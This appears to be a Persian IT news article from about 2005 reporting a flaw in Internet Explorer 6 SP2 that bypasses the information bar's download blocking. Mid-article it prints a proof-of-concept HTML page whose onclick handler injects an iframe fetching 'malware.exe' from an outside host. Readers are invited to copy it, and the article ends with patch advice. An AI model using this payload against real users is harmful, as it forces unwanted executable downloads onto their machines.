| كشف حفره جديد در برنامه Internet Explorer نسخه 6
|
| یک شنبه,26 دي 1383 (تعداد دفعات خوانده شده:3455) |
|
حفره امنیتی خطرناکی در برنامه Internet Explorer نسخه 6 سرویس پک2 کشف شد که از نوع دور زدن مجوزهای تعریف شده یک سرویس می باشد.
به گزارش بخش خبر شبكه فن آوري اطلاعات ايران، از تيم آشيانه، در حال حاضر مرورگر Internet Explorer عمومی ترین مرورگر وب می باشد که بیشترین تعداد کاربران را در بین مرورگرهای اینترنت داراست. مایکروسافت درService Pack 2 ویندوز XP قسمتی را طراحی کرد که دانلود هر فایل را توسط information bar مسدود کند که به موجب آنUser باید حتما بر روی فایل مورد نظر خود کلیک و آنرا با گزینه File Download انتخاب کرده تا بتواند آنرا دانلود کند. مکانیزم information bar به صورتی است که باBlock کردن کدهای مخرب و فهمیدن تمام مراجع قادر به دانلود کردن صحیح فایل ها می باشد. توسط این باگ هکر می تواند با استفاده از کدی قربانی خود را مجبور به دانلود کردن یک فایل با کلیک او بر روی هر قسمت صفحه حتی اگر hyperlink نباشد, بکند و بدین وسیله information bar را دور بزند.
دوستان عزیز برای امتحان کردن این باگ می توانند کد زیر را کپی کرده و در یک صفحه html قرار دهند. لازم به ذکر است که در ابتدای هر خط باید کد ">" را اضافه کنید.
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML> The-Insider <a href="http://theinsider.deep-ice.com>" target="_blank">http://theinsider.deep-ice.com></a>
<br />META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
<br />META http-equiv=Content-Type content="text/html; charset=windows-1252">
<br />META http-equiv=Content-Language content=en-us>
<br />META content=True name=HandheldFriendly>
<br />META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
<br />
<br />embed>
<br />body onclick='a=document.createElement("\<iframe
<br />src=\"http:\/\/theinsider.deep-
<br />ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild
<br />(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
<br />cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>
<br />/BODY></HTML>
<br />------------------------ cut here --------------------------------------
<br /></p>
<br />برای در امان ماندن از خطر این حفره نیز می توانید نسخه Internet Explorer خود را به آخرین Patch ارائه شده از سوی شرکت مایکروسافت Update نمایید.
<br />
</p>
</td>
</tr>
</table>
<p dir="rtl"> </p>
<p align="left" class="SubHead" dir="rtl"><b><a href=newsprint6162.htm target="_blank"><img src="./gfx2/print_icon.gif" border="0" title="نسخه قابل چاپ خبر">
نسخه قابل چاپ</a>
<a href=""> برگشت</a>
<!-- <a href=download.php?id=6162 target="_blank">دريافت بصورت فايل</a> <a href="http://www.iritn.com">
برگشت</a>-->
</b></p>
<table width="99%" class="MojText"><tr><td class="SubHead">عناوين مرتبط</td></tr><tr><td>1- <a href="ITshow-news-16595.htm" target=_blank><b>شرکتهای امنیتی می گویند؛ حفره کامپیوترهای مجازی به حمله هکرها منتهی می شود!</b></a> دوشنبه,27 اسفند 1388<br/>2- <a href="ITshow-news-16110.htm" target=_blank><b>شناسايي حفره جديد امنيتي در سيستم عامل اپل</b></a> شنبه,21 مهر 1388<br/>3- <a href="ITshow-news-15714.htm" target=_blank><b> مايكروسافت دو حفره خطرناك مرورگر خود را برطرف ميكند </b></a> پنج شنبه,3 مرداد 1388<br/>4- <a href="ITshow-news-15695.htm" target=_blank><b>گوگل دو حفره خطرناك امنيتي در كروم را برطرف كرد</b></a> دوشنبه,30 تير 1388<br/>5- <a href="ITshow-news-15656.htm" target=_blank><b>حفره امنيتي اينترنت اكسپلورر كاربران را تهديد ميكند</b></a> دوشنبه,23 تير 1388<br/>6- <a href="ITshow-news-15600.htm" target=_blank><b> حفره امنيتي جديدي در سيستم گرافيكي ويندوز شناسائي شد</b></a> سه شنبه,17 تير 1388<br/>7- <a href="ITshow-news-15594.htm" target=_blank><b>مايكروسافت نسبت به حفره امنيتي خطرناك هشدار داد</b></a> سه شنبه,17 تير 1388<br/>8- <a href="ITshow-news-15379.htm" target=_blank><b>مایکروسافت از حفره امنیتی در DirectX خبر داد</b></a> جمعه,23 خرداد 1388<br/>9- <a href="ITshow-news-14800.htm" target=_blank><b>کشف حفره امنيتي «بسيار خطرناک» در نرمافزار PowerPoint</b></a> شنبه,18 فروردين 1388<br/>10- <a href="ITshow-news-14622.htm" target=_blank><b>شناسايي حفره خطرناك در نرم افزارهاي پي دي اف</b></a> جمعه,18 اسفند 1387<br/>11- <a href="ITshow-news-14618.htm" target=_blank><b>بسته به روز رسانی فایرفاکس حفره های امنیتی را می پوشاند</b></a> چهارشنبه,17 اسفند 1387<br/>12- <a href="ITshow-news-14517.htm" target=_blank><b>مايكروسافت وجود حفرهي امنيتي در ويندوز 7 را انكار كرد.</b></a> جمعه,16 بهمن 1387<br/>13- <a href="ITshow-news-14347.htm" target=_blank><b>تمامي نسخههاي اينترنت اكسپلوره حفره امنيتي دارند.</b></a> جمعه,25 آذر 1387<br/>14- <a href="ITshow-news-14342.htm" target=_blank><b>حفره جدید در تمام نسخه های IE</b></a> چهارشنبه,24 آذر 1387<br/>15- <a href="ITshow-news-14233.htm" target=_blank><b>دسترسی رایگان به سرویس رادیویی Sirius با یک حفره امنیتی</b></a> پنج شنبه,5 آذر 1387<br/></td></tr></table><br/><br/>
<hr size="1" style="color:#000000"/>
<table width="99%" class="MojText">
<tr><td class="SubHead">نظرات كاربران</td></tr>
<tr>
<td>
</td></tr></table><hr size="1" style="color:#000000;"/>
<br/>
<br/>
<form method="POST" action="introduc.php" style="word-spacing: 0; text-indent: 0; line-height: 100%; margin: 0" name="form2" target="_blank">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#111111" bgcolor="#EEEEEE" id="AutoNumber27" style="border-collapse: collapse">
<tr>
<td width="0%"> </td>
<td width="38%"> <p style="margin-top: 0; margin-bottom: 0" align="right">
<b> <font face="Tahoma" size="1" color="#333366"><span lang="fa"> معرفي
شبكه فن آوري اطلاعات ايران به يك دوست </span></font></b></td>
<td width="10%"><div align="center"><span lang="fa"> <font face="Tahoma" size="1">ايميل شما:</font></span></div></td>
<td width="0%"> <div align="center"></div></td>
<td width="16%"> <div align="right">
<input type="text" name="az" size="15" dir="ltr">
</div></td>
<td width="0%"><div align="center"></div></td>
<td width="13%"><div align="center"><span lang="fa"><font face="Tahoma" size="1">ايميل
دوستتان:</font></span><font face="Tahoma"><span lang="fa"></span></font></div></td>
<td width="0%"> <div align="center"></div></td>
<td width="16%"> <div align="right">
<input type="text" name="be" size="15" dir="ltr">
</div></td>
<td width="0%"> <div align="center"></div></td>
<td width="0%"> <div align="center"></div></td>
<td width="10%"> <div align="center">
<input type="button" value=" ارسال " name="B1" style="font-family: Tahoma; font-size: 8pt" onclick="return check_empty()" >
</div></td>
</tr>
<tr><div align="center">
<font face="Tahoma" size="1">با قراردادن كد ذيل ميتوانيد از سيستم نمايشگار اخبار ما بصورت رايگان در سايت/وبلاگ خود استفاده كنيد</font><br>
<textarea rows="3" name="IRITNNEWSDISPLAYER" cols="110" dir="ltr" style="font-family: Tahoma; font-size: 10px"><!-- BEGIN IRITN Free Latest News Service -->
<script src=http://www.iritn.com/latestnews/iritnnews.js></script>
<!-- END IRITN Free Latest News Service --></textarea></div></tr>
</table>
</form>
<br/>
<table cellpadding=0 cellspacing=0 border=0 width=468 align="center">
<tr><td class="adHead"><b>تبـليغــات</b></tr>
<tr><td style="padding-bottom:10px;border-style:outset; border-width:1px;">
<iframe height="94" src="adsfoot1.php" width="664" frameborder=0 scrolling=no marginheight=0 marginwidth=0></iframe>
</td></tr>
</table>
</td><td width="180" align="right" valign="top">
<table width="155" align="center" cellspacing="0" cellpadding="0" class="MojText">
<tr>
<td style="background-image:url('./gfx2/wp1.jpg')" width="155" height="29">
<p align="center"><span style="padding-left:8px; font-family:Tahoma; font-size:12px; font-weight:bold;">
تبليغات داخلي ...
</span> </td>
</tr>
<tr>
<td style="padding-left:2px;padding-right:8px; background-image:url('./gfx2/wp2.jpg')">
<table width="99%" border="0" cellspacing="0" cellpadding="0" align="center" class="mojlink">
<tr>
<td>
<p align="center">
<a href="link140.htm" target="_blank"><div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 0px" align="center"><img src="./gfx/partners/iran-itc.jpg" border="0" width="145" alt="مرکز فن آوری اطلاعات ایران - ارائه خدمات حرفه ای میزبانی وب و ثبت دامنه در ایران با بیش از 8 سال سابقه درخشان"/></div></a><br/><a href="link32.htm" target="_blank"><div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 0px" align="center"><img src="./gfx/partners/adver.gif" border="0" width="145" alt="تعرفه و نحوه سفارش تبليغات در شبكه فن آوري اطلاعات ايران"/></div></a><br/><a href="link8.htm" target="_blank"><div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 0px" align="center"><img src="./gfx/partners/Negahban.gif" border="0" width="145" alt="قويترين مجموعه ابزارهاي امنيتي جهت محافظت نرمافزار"/></div></a><br/></td></tr></table> </td>
</tr>
<tr>
<td><img src="gfx2/wp3.jpg" alt="" /><br /></td>
</tr>
</table>
<table width="155" align="center" cellspacing="0" cellpadding="0" class="MojText">
<tr>
<td style="background-image:url('./gfx2/wp1.jpg')" width="155" height="29">
<p align="center"><span style="padding-left:8px; font-family:Tahoma; font-size:12px; font-weight:bold;">
حاميان ما ...
</span> </td>
</tr>
<tr>
<td style="padding-left:2px;padding-right:8px; background-image:url('./gfx2/wp2.jpg')">
<table width="99%" border="0" cellspacing="0" cellpadding="0" align="center" class="mojlink">
<tr>
<td>
<p align="center">
<a href="link98.htm" style="color:#000000" TARGET="_blank"> بزرگترين پايگاه فناوري اطلاعات ايران!</a><br/><a href="http://www.khodkar.ir" style="color:#000000" TARGET="_blank"><b>جستجوگر خودکار</b> </a><br/><a href="http://www.bapayam.com" style="color:#000000" TARGET="_blank">مرکز تبلیغات اینترنتی ایران</a><br/><a href="link144.htm" style="color:#000000" TARGET="_blank">مرکز داده ملی</a><br/><a href="link146.htm" style="color:#000000" TARGET="_blank">مرکز راهنما</a><br/><a href="http://www.IranITC.com" style="color:#000000" TARGET="_blank">مرکز فن آوری اطلاعات ایران</a><br/><a href="link143.htm" style="color:#000000" TARGET="_blank">خدمات پیام کوتاه (SMS) ایران</a><br/><a href="link133.htm" style="color:#000000" TARGET="_blank">جستجوگر اخبار خودکار</a><br/><a href="http://www.iranitnetwork.com" style="color:#000000" TARGET="_blank">Iran IT Network</a><br/><a href="link120.htm" style="color:#000000" TARGET="_blank">IranITN</a><br/><a href="link121.htm" style="color:#000000" TARGET="_blank">شبکه</a><br/><a href="link110.htm" style="color:#000000" TARGET="_blank">شبكه فناوري اطلاعات</a><br/><a href="link145.htm" style="color:#000000" TARGET="_blank">VPS و سرور اختصاصی</a><br/><a href="link131.htm" style="color:#000000" TARGET="_blank">فرمانداری مشهد</a><br/><a href="link109.htm" style="color:#000000" TARGET="_blank">فناوري اطلاعات ايران</a><br/><a href="link126.htm" style="color:#000000" TARGET="_blank">هاستینگ و نمایندگی</a><br/></td></tr></table> </td>
</tr>
<tr>
<td><img src="gfx2/wp3.jpg" alt="" /><br /></td>
</tr>
</table>
</td></tr></table></td>
</tr>
</table>
</td>
</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0" border="0" class="SmlText">
<tr>
<td valign="bottom" width="100%" align="center" height="100%" bgcolor="#dedede">
<p dir="rtl">
<span lang="fa"><font face="Tahoma" size="1">نقل اخبار/اطلاعات ساير
سايتها/پايگاهها لزوما به معناي تائيد آنها نيست، بلكه مسئوليت تمامي مطالب
ارسالي به عهده پايگاههاي مربوطه ميباشد</font><font size="1"><br>
</font>
</span><font size="1" face="Tahoma">نقل مطالب سايت با ذکر منبع (www.IRITN.com) و نام نويسنده مجاز است.</font><br>
All
rights reserved. Copyright 2003-2010 by <a href="http://www.KeyanaIT.com">KEYANA IT Co.</a> Computed in 0.06
seconds<br>
(Best Viewed With IE 6.0 or higher (1024x768
</td></tr>
</table>
</body>
</html> |
